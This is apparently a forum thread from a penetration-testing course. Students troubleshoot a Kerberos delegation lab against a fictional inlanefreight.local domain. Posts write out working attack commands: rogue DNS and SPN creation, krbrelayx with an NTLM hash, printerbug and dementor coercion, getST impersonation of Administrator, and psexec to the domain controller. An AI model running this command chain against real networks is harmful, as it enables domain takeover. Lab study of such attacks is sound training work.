Kerberos attacks

Hi all,

I had a hard time reproducing the attack from the PwnBox. I gave it a try from my Kali lab machine and I did not encounter any issue. I could not force the DC to authenticate against my machine when performing the attack from PwnBox … not sure why.

Hi guys,
I would really appreciate some help with this section. Whenever I get to the part where I’m running dementor.py or printerbug.py, I get an error from krbrelayx.py saying
“Unsupported MechType ‘NTLMSSP - Microsoft NTLM Security Support Provider’”
And essentially I’m not getting a TGT.
I tried every possible solution I could find online and I still can’t figure it out.
I tried restarting the machine a few times, and also tried the lab both from the pwnbox and from my own kali lab.

-made sure that the hosts file has a record for inlanefreight.local and dc01.inlanefreight.local
-when creating the DNS record I used NSLOOKUP to make sure that it resolves to my IP
-when creating the fake SPN, I made sure that it exists by using addspn.py to query callum.dixon
-tried running krbrelayx.py with callum.dixon’s user/pass or hashes
-re-installed impacket

here are the commands I use:
python dnstool.py -u INLANEFREIGHT.LOCAL\carole.rose -p jasmine -r roguecomputer.INLANEFREIGHT.LOCAL -d --action add <DC_IP>

python addspn.py -u INLANEFREIGHT.LOCAL\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local

(after these two steps I make sure that the dns a record got created and that the SPN has been added and everything seems fine)

sudo python krbrelayx.py -hashes :3E7C48255206470A13543B27B7AF18DE (also tried this command with callum.dixon’s username and pass)

python3 printerbug.py inlanefreight.local/carole.rose:jasmine@<dc_ip> roguecomputer.inlanefreight.local

OR
python3 dementor.py -u carole.rose -p jasmine -d inlanefreight.local roguecomputer.inlanefreight.local dc01.inlanefreight.local

would appreciate any help!!!
thank you
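The “Unsupported MechType” error quoted above is krbrelayx reporting that the client which connected to its listener offered NTLMSSP, not Kerberos, as its preferred SPNEGO mechanism, so there is no Kerberos ticket to capture. Added example (not code from the thread, krbrelayx or impacket): a small DER walker that extracts the mechTypes list from a GSS-API NegTokenInit and applies the same accept/reject rule; the two sample tokens at the bottom are constructed, and the mechanism labels follow the wording of the error above.

```python
SPNEGO  = bytes.fromhex("2b0601050502")            # OID 1.3.6.1.5.5.2, DER body
NTLMSSP = bytes.fromhex("2b06010401823702020a")    # OID 1.3.6.1.4.1.311.2.2.10
MS_KRB5 = bytes.fromhex("2a864882f712010202")      # OID 1.2.840.48018.1.2.2
KRB5    = bytes.fromhex("2a864886f712010202")      # OID 1.2.840.113554.1.2.2
MECH = {NTLMSSP: "NTLMSSP - Microsoft NTLM Security Support Provider",
        MS_KRB5: "MS KRB5 - Microsoft Kerberos 5", KRB5: "KRB5 - Kerberos 5"}
KERBEROS = {MECH[MS_KRB5], MECH[KRB5]}

def _read_tlv(buf: bytes, pos: int) -> tuple:
    """Read one DER TLV at pos; return (tag, value, position after it)."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:                                  # long-form length
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln

def parse_mech_types(token: bytes) -> list:
    """List the mechTypes a GSS-API/SPNEGO InitialContextToken offers, preferred first."""
    tag, body, _ = _read_tlv(token, 0)
    if tag != 0x60:
        raise ValueError("not a GSS-API InitialContextToken")
    tag, oid, pos = _read_tlv(body, 0)
    if tag != 0x06 or oid != SPNEGO:
        raise ValueError("not SPNEGO")
    node = body[pos:]  # peel [0] NegTokenInit -> SEQUENCE -> [0] mechTypes -> SEQUENCE OF
    for _ in range(4):
        _, node, _ = _read_tlv(node, 0)
    mechs, pos = [], 0
    while pos < len(node):
        _, oid, pos = _read_tlv(node, pos)
        mechs.append(MECH.get(oid, "unknown OID " + oid.hex()))
    return mechs

def classify(token: bytes) -> str:
    """The accept/reject rule: the client's preferred mech must be Kerberos."""
    first = parse_mech_types(token)[0]
    return "ok: Kerberos" if first in KERBEROS else "Unsupported MechType '%s'" % first

def _tlv(tag: int, value: bytes) -> bytes:         # short-form lengths suffice for samples
    return bytes([tag, len(value)]) + value

def build_neg_token_init(mech_oids: list) -> bytes:
    """Constructed sample: a minimal NegTokenInit carrying only the mechTypes list."""
    oids = b"".join(_tlv(0x06, o) for o in mech_oids)
    neg_init = _tlv(0x30, _tlv(0xA0, _tlv(0x30, oids)))
    return _tlv(0x60, _tlv(0x06, SPNEGO) + _tlv(0xA0, neg_init))

NTLM_ONLY = build_neg_token_init([NTLMSSP])                 # client fell back to NTLM
KRB_FIRST = build_neg_token_init([MS_KRB5, KRB5, NTLMSSP])  # Kerberos negotiated, NTLM fallback
```

Feeding the first token through `classify` yields exactly the message from the post; a Windows client that actually went through the KDC for the rogue SPN produces the second shape.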

After spending 3 days on this one lab I finally managed to solve the issue by
specifying dc01 as the target which finally got a TGT for dc01$

sudo python krbrelayx.py -hashes :3E7C48255206470A13543B27B7AF18DE --target dc01.inlanefreight.local

I haven’t found this solution on any other forum so I hope this helps future generations :stuck_out_tongue:


that worked for me! thanks!

So I’ve got the ticket successfully, but I keep getting “access denied” when trying to use smbclient or psexec, etc.

This lab is stupid. For anyone who still cannot finish this:

  • Use your own VM where impacket tools are fine
  • Add the flag --target just like what @v0idwalker said

Hi, @cbr0t.

Excuse my question. Did you have a problem running psexec.py in the Constrained Delegation module from Linux?

I have the following error:

Impacket v0.13.0.dev0+2024916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket
[+] StringBinding ncacn_np:DC01[\pipe\svcctl]
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/impacket/nmb.py", line 900, in _setup_connection
    af, socktype, proto, canonname, sa = socket.getaddrinfo(peer[0], peer[1], 0, socket.SOCK_STREAM)[0]
                                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

I added the domain controller’s IP in /etc/hosts, then I ran nslookup DC01.INLANEFREIGHT.LOCAL and it shows me this:

** server can’t find DC01.INLANEFREIGHT.LOCAL: NXDOMAIN

I checked /etc/resolve and added the domain lines and the error still persists.

Not that I remember. No.

Hi @v0idwalker.

I have a problem with this command:

──╼ [★]$ sudo python krbrelayx.py -hashes :3E7C48255206470A13543B27B7AF18DE --target dc01.inlanefreight.local
[*] Protocol Client HTTPS loaded…
[*] Protocol Client HTTP loaded…
[*] Protocol Client LDAPS loaded…
[*] Protocol Client LDAP loaded…
[*] Protocol Client SMB loaded…
[*] Running in attack mode to single host
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
Exception in thread Thread-2:
Traceback (most recent call last):
  File "/usr/lib/python3.11/threading.py", line 1038, in _bootstrap_inner
    self.run()
  File "/usr/local/lib/python3.11/dist-packages/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 560, in run
    self.server = self.HTTPServer((self.config.interfaceIp, self.config.listeningPort), self.HTTPHandler, self.config)
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 47, in __init__
    socketserver.TCPServer.__init__(self, server_address, RequestHandlerClass)
  File "/usr/lib/python3.11/socketserver.py", line 456, in __init__
    self.server_bind()
  File "/usr/lib/python3.11/socketserver.py", line 472, in server_bind
    self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use

I uninstalled impacket and krbrelayx.py but I can’t solve it.

Can you help me?

Hi @CrazyHorse302 and @Alt_F4, thanks for your tips. I got the flag.

Check if PwnBox has the right privileges and if DNS resolution matches Kali’s.

I’m running into the same issue and also completed the same troubleshooting steps. Not sure what the issue is. Did you ever resolve it?

Hi @grai123, I solved it.

Can you send me the step by step that you did?

I followed the instructions in the module.
I used GetST with beth.richards’ credentials to craft a ticket impersonating a local administrator, and exported that to the KRB5CCNAME env variable:

getST.py -spn TERMSRV/DC01 'INLANEFREIGHT.LOCAL/beth.richards:B3thR!ch@rd' -impersonate Administrator
export KRB5CCNAME=./Administrator.ccache

Then I used psexec to connect to DC01 as the local administrator

psexec.py -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01 -debug

And I get that same exact socket error you got. I too added the DC’s IP in /etc/hosts, and when I run dig or nslookup, it can’t find it. I can ping it though. I tried this on my local Kali VM and in PwnBox and I get the same result.

This is my entry in /etc/hosts

<ip>   inlanefreight.local dc01.inlanefreight.local

I’ve tried different flags with psexec too, like -target-ip, -dc-ip, specifying “[email protected]”. At this point, I’m not sure of the exact issue.

OK, so I fixed a few things. I noticed when I run the getST impacket module, the ticket is saved as “Administrator@[email protected]”, not “Administrator.ccache” like in the example. So I changed the env variable accordingly:

export KRB5CCNAME=./Administrator@[email protected]

I was able to find this out by running the “klist” command.
This is the output of the command:

Ticket cache: FILE:./Administrator@[email protected]
Default principal: [email protected]

Valid starting       Expires              Service principal
02/20/2025 07:36:33  02/20/2025 17:36:33  TERMSRV/[email protected]
        renew until 02/21/2025 07:36:32

Next, I also updated the psexec command and specified the domain with the user like so:

/usr/bin/impacket-psexec -k -no-pass INLANEFREIGHT.LOCAL/[email protected] -debug

That seems to have fixed the connection issue. Now, I get a different error - preauth failed:

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] StringBinding ncacn_np:dc01.inlanefreight.local[\pipe\svcctl]
[+] Using Kerberos Cache: ./Administrator@[email protected]
[+] SPN CIFS/[email protected] not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] SPN KRBTGT/[email protected] not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] No valid credentials found in cache
[+] Trying to connect to KDC at INLANEFREIGHT.LOCAL:88
[+] Trying to connect to KDC at INLANEFREIGHT.LOCAL:88
[+] Server time (UTC): 2025-02-20 12:44:28

<SNIP>

impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
[-] Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)

I’ll try resetting the machine and going through the steps again

For anyone else who may come upon this thread, definitely follow the hints listed above to get around the issues you find when following the instructions, specifically adding additional flags. This includes the very last step, namely having to add -dc-ip.

The problem isn’t you, the instructions just don’t lead to success.